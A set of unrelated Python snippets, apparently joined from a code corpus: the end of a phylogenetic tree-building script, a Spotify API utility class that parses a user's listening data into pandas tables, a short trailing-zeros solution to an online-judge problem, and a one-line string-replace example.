getDataFiles(conf, infile)
util.logger("fasta:", fastafile)
util.logger("align:", alignfile)
util.logger("dist: ", distfile)
util.logger("label:", labelfile)
util.logger("tree: ", treefile)
# start the timer
timer = util.Timer()
timer.start()
# run each program
dist2tree(conf, distfile, labelfile, basename)
# stop timer
runtime = timer.stop()
return True
def dist2tree(conf, distfile, labelfile, basename):
labels, mat = phylip.read_dist_matrix(distfile)
treefile = getTreeFile(conf, basename)
usertree = getUserTree(conf, basename)
# check family size
if not checkFamilySize(conf, len(labels), distfile):
return
if labelfile != None:
labels = fasta.read_fasta(labelfile).keys()
timer = util.Timer()
timer.start()
if usertree == None:
raise "Must supply usertree with 'lse'"
lse = phylo.least_square_error(usertree, mat, labels, weighting=False)
tree = usertree
tree.write(treefile)
def main(conf):
# determine input files
files = copy.copy(conf["REST"])
if conf["stdin"]:
for line in sys.stdin:
files.append(line.rstrip())
util.tic("phyloall")
for f in files:
run(conf, f)
util.toc()
return 0
if __name__ == "__main__":
sys.exit(main(conf))
|
import spotipy.util as util
import pandas as pd
import spotipy
from datetime import datetime
from time import sleep
class SpotifyUtil:
"""
Utility class for accessing Spotify API
"""
query_dict = {
"current_user_recently_played": "parse_songplays",
"current_user_top_artists": "parse_top_artists",
"current_user_top_tracks": "parse_tracks",
"current_user_playlists": "parse_playlists",
"playlist_items": "parse_playlists_items",
}
def __init__(self, username, client_id, client_secret, redirect_uri):
self.username = username
self.client_id = client_id
self.client_secret = client_secret
self.redirect_uri = redirect_uri
self.session = ""
def setup(self, scope):
"""
Setup Spotify connection and authorization
"""
print("-- Initializing Spotify connection SETUP")
token = self.get_token(scope=scope)
print("token is ready!")
session = self.get_connection(token=token)
self.session = session
sleep(1)
print(f"connection and user are ready! {self.session}")
def get_spotify_data(self, query, limit=50, time_range="long_term"):
"""
Retrieves data from Spotify
"""
if query == "current_user_top_tracks":
json = getattr(self.session, query)(limit=limit, time_range=time_range)
else:
json = getattr(self.session, query)(limit=limit)
self.df = getattr(self, self.query_dict[query])(data=json)
if query == "current_user_playlists":
items = []
for index in self.df.index.tolist():
json_items = getattr(self.session, "playlist_items")(
limit=100, playlist_id=self.df.at[index, "playlist_id"]
)
if len(json_items['items']) > 0:
playlist_items, columns = getattr(
self, self.query_dict["playlist_items"]
)(data=json_items, playlist_id=self.df.at[index, "playlist_id"])
items.append(playlist_items)
df_items = pd.concat(items, ignore_index=True)
return self.df, df_items
return self.df
def get_token(self, scope):
"""
Obtains the token for user authorization
"""
token = util.prompt_for_user_token(
username=self.username,
scope=scope,
client_id=self.client_id,
client_secret=self.client_secret,
redirect_uri=self.redirect_uri,
)
return token
def get_connection(self, token):
"""
Sets up the Spotify Connection
"""
spotify = spotipy.Spotify(auth=token)
return spotify
def parse_json(self, data, columns, *args, **kwargs):
"""
Parses response data in JSON format
"""
if not (kwargs.get("result_key") == None):
data = data[kwargs["result_key"]]
df = pd.json_normalize(data).reset_index()
if "id" in columns:
df = df.dropna(subset = ["id"])
df["index"] = df["index"] + 1
df = df[columns.keys()].rename(columns=columns)
return df
def parse_primary_other(self, parse_list=[]):
"""
Parses primary and other values for lists
"""
parse_list = parse_list.copy()
try:
primary = parse_list.pop(0)
except IndexError:
primary = None
others = ", ".join(parse_list)
return primary, others
def parse_songplays(self, data, columns=None):
"""
Parses songplays data of user
"""
if columns is None:
columns = {
"index": "songplays_id",
"track.id": "track_id",
"track.name": "track_name",
"track.artists": "artists",
"track.duration_ms": "track_duration",
"track.explicit": "track_is_explicit",
"track.popularity": "track_popularity",
"played_at": "track_played_at",
"track.album.id": "album_id",
"track.album.name": "album_name",
"track.album.release_date": "album_release_year",
"track.album.type": "album_type",
}
songplays = self.parse_json(data=data, columns=columns, result_key="items")
# Parse artists
def parse_artist(artists):
# parse primary and other artists
artist_name, artist_name_others = self.parse_primary_other(
[artist["name"] for artist in artists]
)
artist_id, artist_id_others = self.parse_primary_other(
[artist["id"] for artist in artists]
)
return artist_name, artist_name_others, artist_id, artist_id_others
(
songplays["artist_name"],
songplays["artist_name_others"],
songplays["artist_id"],
songplays["artist_id_others"],
) = zip(*songplays["artists"].apply(parse_artist))
# Get release year
def parse_year(album_release_year):
try:
year = datetime.strptime(album_release_year, "%Y-%m-%d").year
except (ValueError, NameError):
year = datetime.strptime(album_release_year, "%Y").year
return year
songplays["album_release_year"] = songplays["album_release_year"].apply(
lambda x: parse_year(x)
)
# Convert timestamp
try:
songplays["track_played_at"] = songplays["track_played_at"].apply(
lambda x: pd.Timestamp(x).strftime("%Y-%m-%d %H:%M:%S")
)
except KeyError:
pass
# Convert track duration
songplays["track_duration"] = songplays["track_duration"].apply(
lambda x: x / 60000
)
# Get features
def get_features(key, method, df, columns, result_key=None):
for values_list in self.split_in_chunks(df[key].values.tolist(), 50):
features = getattr(self.session, method)(values_list)
features_df = self.parse_json(
data=features, columns=columns, result_key=result_key
)
features_df.drop_duplicates(subset=key, inplace=True)
df = df.merge(features_df, how="left", on=key)
return df
# Get track features
track_features_columns = {
"id": "track_id",
"danceability": "track_danceability",
"energy": "track_energy",
"key": "track_key",
"loudness": "track_loudness",
"mode": "track_mode",
"speechiness": "track_speechiness",
"acousticness": "track_acousticness",
"instrumentalness": "track_instrumentalness",
"liveness": "track_liveness",
"valence": "track_valence",
}
songplays = get_features(
key="track_id",
method="audio_features",
df=songplays,
columns=track_features_columns,
)
# Get artist features
artist_features_columns = {
"id": "artist_id",
"genres": "artist_genres",
"popularity": "artist_popularity",
"followers.total": "artist_followers",
}
songplays = get_features(
key="artist_id",
method="artists",
df=songplays,
columns=artist_features_columns,
result_key="artists",
)
# Parse genres
if "artist_genres" in songplays.columns:
(songplays["artist_genre"], songplays["artist_genre_others"]) = zip(
*songplays["artist_genres"].apply(self.parse_primary_other)
)
songplays.drop(columns=["artist_genres", "artists"], axis=1, inplace=True)
return songplays
def parse_top_artists(self, data):
"""
Parses top artists of user
"""
columns = {
"index": "artist_rank",
"id": "artist_id",
"name": "artist_name",
"genres": "artist_genres",
"popularity": "artist_popularity",
"followers.total": "artist_followers",
}
print(columns)
top_artists = self.parse_json(data=data, columns=columns, result_key="items")
print(f"top_artists {top_artists}")
# Parse genres
(top_artists["artist_genre"], top_artists["artist_genre_others"]) = zip(
*top_artists["artist_genres"].apply(self.parse_primary_other)
)
top_artists.drop(columns=["artist_genres"], axis=1, inplace=True)
return top_artists
def parse_tracks(self, data, playlist_id=None):
"""
Parses top tracks of user
"""
columns = {
"index": "track_rank",
"id": "track_id",
"name": "track_name",
"artists": "artists",
"duration_ms": "track_duration",
"explicit": "track_is_explicit",
"popularity": "track_popularity",
"album.id": "album_id",
"album.name": "album_name",
"album.release_date": "album_release_year",
"album.type": "album_type",
}
if playlist_id:
columns["playlist_id"] = playlist_id
top_tracks = self.parse_songplays(data=data, columns=columns)
return top_tracks
def parse_playlists(self, data):
"""
Parses playlists of user
"""
columns = {
"index": "playlist_rank",
"id": "playlist_id",
"name": "playlist_name",
"tracks.total": "playlist_size",
"public": "playlist_is_public",
"collaborative": "playlist_is_collaborative",
}
playlists = self.parse_json(data=data, columns=columns, result_key="items")
return playlists
def parse_playlists_items(self, data, playlist_id):
"""
Parses items of a playlist of user
"""
print(f"playlist_id: {playlist_id}")
tmp_list = [item["track"] for item in data["items"]]
data["items"] = tmp_list
playlist_items = self.parse_tracks(data=data)
playlist_items["playlist_id"] = playlist_id
columns = playlist_items.columns
return playlist_items, columns
def split_in_chunks(self, lst, n):
for i in range(0, len(lst), n):
yield lst[i : i + n]
|
# 출처: https://www.acmicpc.net/source/17969385
N = int(input())
count = [0]*2
for i in range(N, 0, -1):
while i % 2 == 0:
count[0] += 1
i = i//2
while i % 5 == 0:
count[1] += 1
i = i//5
print(min(count))
|
s= 'string'
ad = s.replace("t", '')
print(ad)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.